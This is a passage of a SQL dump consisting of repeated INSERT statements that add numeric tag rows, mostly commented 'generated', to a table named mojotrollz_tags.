`mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (491, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (494, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (494, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (495, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (495, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (499, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (499, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (500, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (500, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (501, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (501, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (502, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (502, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (503, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (503, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (504, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (504, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (505, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (506, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (506, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (507, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (507, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (510, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (511, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (511, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (513, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (513, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (514, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (514, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (515, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (515, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (517, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (517, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (518, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (518, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (519, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (519, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (520, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (520, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (521, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (521, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (522, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (522, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (523, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (523, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (524, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (524, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (525, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (525, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (531, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (531, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (533, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (533, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (534, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (534, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (539, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (539, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (541, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (543, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (543, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (544, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (544, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (545, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (547, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (548, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (550, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (565, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (568, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (568, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (569, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (569, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (570, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (570, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (572, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (572, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (573, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (573, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (574, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (574, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (575, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (576, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (576, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (578, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (578, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (579, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (579, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (580, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (580, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (582, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (582, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (583, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (584, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (584, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (587, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (587, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (588, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (588, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (589, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (589, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (590, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (590, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (594, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (594, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (595, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (595, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (596, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (596, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (597, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (597, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (598, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (598, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (598, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (599, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (599, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (603, 1, 30, 4, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (604, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (604, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (615, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (615, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (616, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (616, 1, 30, 2, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (619, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (619, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (620, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (620, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (622, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (622, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (622, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (623, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (623, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (624, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (624, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (625, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (625, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (626, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (626, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (628, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (628, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (633, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (633, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (634, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (634, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (634, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (636, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (636, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (636, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (639, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (639, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (639, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (641, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (641, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (641, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (642, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (642, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (642, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (643, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (644, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (644, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (644, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (645, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (645, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (645, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (646, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (646, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (646, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (647, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (647, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (647, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (656, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (656, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (657, 1, 1, 36, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (657, 1, 2, 1581, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (657, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (658, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (658, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (659, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (660, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (660, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (661, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (661, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (663, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (663, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (664, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (664, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (667, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (667, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (669, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (669, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (670, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (670, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (671, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (671, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (672, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (672, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (674, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (674, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (675, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (675, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (676, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (676, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (677, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (677, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (678, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (678, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (679, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (679, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (680, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (680, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (681, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (681, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (682, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (682, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (683, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (683, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (684, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (685, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (685, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (686, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (686, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (687, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (687, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (688, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (688, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (689, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (689, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (690, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (690, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (691, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (691, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (694, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (694, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (696, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (696, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (697, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (697, 1, 30, 0, 'generated'); INSERT INTO 